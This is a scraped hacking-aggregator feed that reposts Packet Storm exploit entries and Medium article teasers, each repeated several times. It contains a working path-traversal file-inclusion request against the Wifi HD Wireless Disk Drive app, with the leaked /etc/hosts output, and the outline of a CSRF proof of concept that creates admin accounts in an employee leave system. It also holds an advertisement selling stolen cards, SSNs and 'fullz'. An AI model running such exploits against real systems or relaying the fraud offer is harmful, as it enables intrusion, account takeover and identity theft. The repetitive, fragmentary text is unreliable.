Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Online Employee Leave Management System 1.0 Cross Site Request Forgery
https://3.bp.blogspot.com/-vLPaJ0bXchM/WWlvcii8AuI/AAAAAAAAIPY/lohzKYQrhRkUA5ocnA3xRTtIEj7YZIM-ACLcBGAs/s1600/h77.png
Online Employee Leave Management System version 1.0 suffers from a cross site request forgery vulnerability.
SHA-256 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Online Employee Leave Management System 1.0 Cross Site Request Forgery
https://3.bp.blogspot.com/-vLPaJ0bXchM/WWlvcii8AuI/AAAAAAAAIPY/lohzKYQrhRkUA5ocnA3xRTtIEj7YZIM-ACLcBGAs/s1600/h77.png
Online Employee Leave Management System version 1.0 suffers from a cross site request forgery vulnerability.
SHA-256 |
0710715d45689c909a85c5900c640070b5bf1573e0e7b5eaa10c502265e786a4Download
# Exploit Title: Online Employee Leave Management System 1.0 - Cross-Site Request Forgery (addemployee.php)
# Date: 05/09/2022
# Exploit Author: Amolo Hunters
# Software Link: https://www.sourcecodester.com/php/15374/online-employee-leave-management-system-php-free-source-code.html
# Version: 1.0
# Tested on: Linux
Title:
================
Online Employee Leave Management System 1.0 - Cross-Site Request Forgery (addemployee.php)
Summary:
================
The Online Employee Leave Management System suffers from a vulnerability called Cross-Site Request Forgery that affects the addemployee.php application used to add employees with administrative privileges. By failing to block against this attack, malicious users can take advantage of this weakness to spoof a request leading to the creation of a new account with administrative privileges.
Severity Level:
================
5.4 (Medium)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
Affected Product:
================
Online Employee Leave Management System v1.0
Steps to Reproduce:
================
1. Create an HTML file and paste the following code:
Online Employee Leave Management System (addemployee.php) CSRF PoC
Online Employee Leave Management System (addemployee.php) CSRF PoC
by Amolo Hunters
2. Save the file and run it in the browser
Note: you need to be logged in as an administrator
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Online Employee Leave Management System 1.0 Cross Site Request Forgery
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Wifi HD Wireless Disk Drive 11 Local File Inclusion
https://3.bp.blogspot.com/-Gb5I5b_xjQ0/WWlu86s-SoI/AAAAAAAAIJk/Vrr0JqyMe7wOp_97KyfJoVRHnDW4ZjPNwCLcBGAs/s1600/h112.png
Wifi HD Wireless Disk Drive version 11 suffers from a local file inclusion vulnerability.
SHA-256 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Wifi HD Wireless Disk Drive 11 Local File Inclusion
https://3.bp.blogspot.com/-Gb5I5b_xjQ0/WWlu86s-SoI/AAAAAAAAIJk/Vrr0JqyMe7wOp_97KyfJoVRHnDW4ZjPNwCLcBGAs/s1600/h112.png
Wifi HD Wireless Disk Drive version 11 suffers from a local file inclusion vulnerability.
SHA-256 |
b20518edc15d62d991e82375c15b066d88b50865b9271eeedc4ac3a8e580a204Download
# Exploit Title: Wifi HD Wireless Disk Drive Local File Inclusion
# Date: Aug 13, 2022
# Exploit Author: Chokri Hammedi
# Vendor Homepage: http://www.savysoda.com
# Software Link: https://apps.apple.com/us/app/wifi-hd-wireless-disk-drive/
id311170976
# Version: 11
# Tested on: iPhone OS 15_5
GET /../../../../../../../../../../../../../../../../etc/hosts HTTP/1.1
Host: 192.168.1.100
Connection: close
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 15_5 like Mac OS X)
AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Safari/604.1
Referer: http://192.168.1.103/
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
-----------------
HTTP/1.1 200 OK
Content-Disposition: attachment
Content-Type: application/download
Content-Length: 213
Accept-Ranges: bytes
Date: Sat, 13 Aug 2022 03:33:30 GMT
##
# Host Database
#
# localhost is used to configure the loopback interface
# when the system is booting. Do not change this entry.
##
127.0.0.1 localhost
255.255.255.255 broadcasthost
::1 localhost
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Wifi HD Wireless Disk Drive 11 Local File Inclusion
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
A young “Tony” planning his next software program.
https://cdn-images-1.medium.com/max/600/1*3_o-rJ9ONp6oNKVjttnTsg.png
Can anyone figure out what I was trying to do?
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
A young “Tony” planning his next software program.
https://cdn-images-1.medium.com/max/600/1*3_o-rJ9ONp6oNKVjttnTsg.png
Can anyone figure out what I was trying to do?
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
A young “Tony” planning his next software program.
Can anyone figure out what I was trying to do?
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Active (Network) Reconnaissance Tools for Hackers
https://cdn-images-1.medium.com/max/800/1*6nApKvX3Dl-lAFbXfZDmVw.png
Host discovery, port scanning, and more…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Active (Network) Reconnaissance Tools for Hackers
https://cdn-images-1.medium.com/max/800/1*6nApKvX3Dl-lAFbXfZDmVw.png
Host discovery, port scanning, and more…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Active (Network) Reconnaissance Tools for Hackers
Host discovery, port scanning, and more…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Beginner picoMini CTF 2022 — Writeup
https://cdn-images-1.medium.com/max/600/0*kuz_rMx2_EmArlFZ.png
~ In this article, we will cover:
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Beginner picoMini CTF 2022 — Writeup
https://cdn-images-1.medium.com/max/600/0*kuz_rMx2_EmArlFZ.png
~ In this article, we will cover:
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Beginner picoMini CTF 2022 — Writeup
~ In this article, we will cover:
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
[LEAKED API] Parsing Information of Fear and Greed Index (cnn.com)
https://cdn-images-1.medium.com/max/1027/1*S1AxzLb2p6Z8kpvIj3N81A.png
TL;DR: This tutorial is just for educational purposes, not for private usage.
Continue reading on ILLUMINATION »
___________________________
@hacking_Attack
@Hacking_Video
[LEAKED API] Parsing Information of Fear and Greed Index (cnn.com)
https://cdn-images-1.medium.com/max/1027/1*S1AxzLb2p6Z8kpvIj3N81A.png
TL;DR: This tutorial is just for educational purposes, not for private usage.
Continue reading on ILLUMINATION »
___________________________
@hacking_Attack
@Hacking_Video
Medium
[LEAKED API] Parsing Information of Fear and Greed Index (cnn.com)
TL;DR: This tutorial is just for educational purposes, not for private usage. Some years ago, I started a private program that was fetching…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
All CreditCard Banks PayPal wu cashapp zelle blank atm cc ssn id dL fullz criminal records clearing
ALBERT’S CASH TEAM SERVICE WORLDWIDE(GET RICH NOW/SOLVE ALL PROBLEM NOW)
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
All CreditCard Banks PayPal wu cashapp zelle blank atm cc ssn id dL fullz criminal records clearing
ALBERT’S CASH TEAM SERVICE WORLDWIDE(GET RICH NOW/SOLVE ALL PROBLEM NOW)
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
All CreditCard Banks PayPal wu cashapp zelle blank atm cc ssn id dL fullz criminal records clearing
ALBERT’S CASH TEAM SERVICE WORLDWIDE(GET RICH NOW/SOLVE ALL PROBLEM NOW)
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Nuevo servicio de phishing EvilProxy permite a los ciberdelincuentes eludir la seguridad de 2…
https://cdn-images-1.medium.com/max/1691/0*lXEQuH0ymbFvADLB
Un nuevo conjunto de herramientas de phishing como servicio (PhaaS) denominado EvilProxy se anuncia en la clandestinidad criminal como un…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Nuevo servicio de phishing EvilProxy permite a los ciberdelincuentes eludir la seguridad de 2…
https://cdn-images-1.medium.com/max/1691/0*lXEQuH0ymbFvADLB
Un nuevo conjunto de herramientas de phishing como servicio (PhaaS) denominado EvilProxy se anuncia en la clandestinidad criminal como un…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Nuevo servicio de phishing EvilProxy permite a los ciberdelincuentes eludir la seguridad de 2 factores
Un nuevo conjunto de herramientas de phishing como servicio (PhaaS) denominado EvilProxy se anuncia en la clandestinidad criminal como un…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
New Generation Crypto — BlackCatCoin
https://cdn-images-1.medium.com/max/1125/0*prvjNZ3pNiCTpvzk
Cats, as you already understood, we have our own coin — BlackCatCoin (BCC). Most cryptocurrencies are created on two algorithms — PoW…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
New Generation Crypto — BlackCatCoin
https://cdn-images-1.medium.com/max/1125/0*prvjNZ3pNiCTpvzk
Cats, as you already understood, we have our own coin — BlackCatCoin (BCC). Most cryptocurrencies are created on two algorithms — PoW…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
New Generation Crypto — BlackCatCoin
Cats, as you already understood, we have our own coin — BlackCatCoin (BCC). Most cryptocurrencies are created on two algorithms — PoW…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Tools to Access Senior Engineers for Early Companies
https://cdn-images-1.medium.com/max/1603/1*3TPTsqqpeD50q050_GkQvw.png
Competing with Google for top talent can feel defeating. They have unlimited money, and all the clout. But there is a boutique industry…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Tools to Access Senior Engineers for Early Companies
https://cdn-images-1.medium.com/max/1603/1*3TPTsqqpeD50q050_GkQvw.png
Competing with Google for top talent can feel defeating. They have unlimited money, and all the clout. But there is a boutique industry…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Tools to Access Senior Engineers for Early Companies
Competing with Google for top talent can feel defeating. They have unlimited money, and all the clout. But there is a boutique industry…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Luksusfellen for utviklere er å ignorere sikkerhetsgjeld
https://cdn-images-1.medium.com/max/2600/0*3sm72pw_RErxm60G
Produktet du ikke vedlikeholder er en voksende sikkerhetsrisiko som fort kan utvikle seg til å bli en kostbar affære.
Continue reading on Bekk »
___________________________
@hacking_Attack
@Hacking_Video
Luksusfellen for utviklere er å ignorere sikkerhetsgjeld
https://cdn-images-1.medium.com/max/2600/0*3sm72pw_RErxm60G
Produktet du ikke vedlikeholder er en voksende sikkerhetsrisiko som fort kan utvikle seg til å bli en kostbar affære.
Continue reading on Bekk »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Luksusfellen for utviklere er å ignorere sikkerhetsgjeld
Produktet du ikke vedlikeholder er en voksende sikkerhetsrisiko som fort kan utvikle seg til å bli en kostbar affære.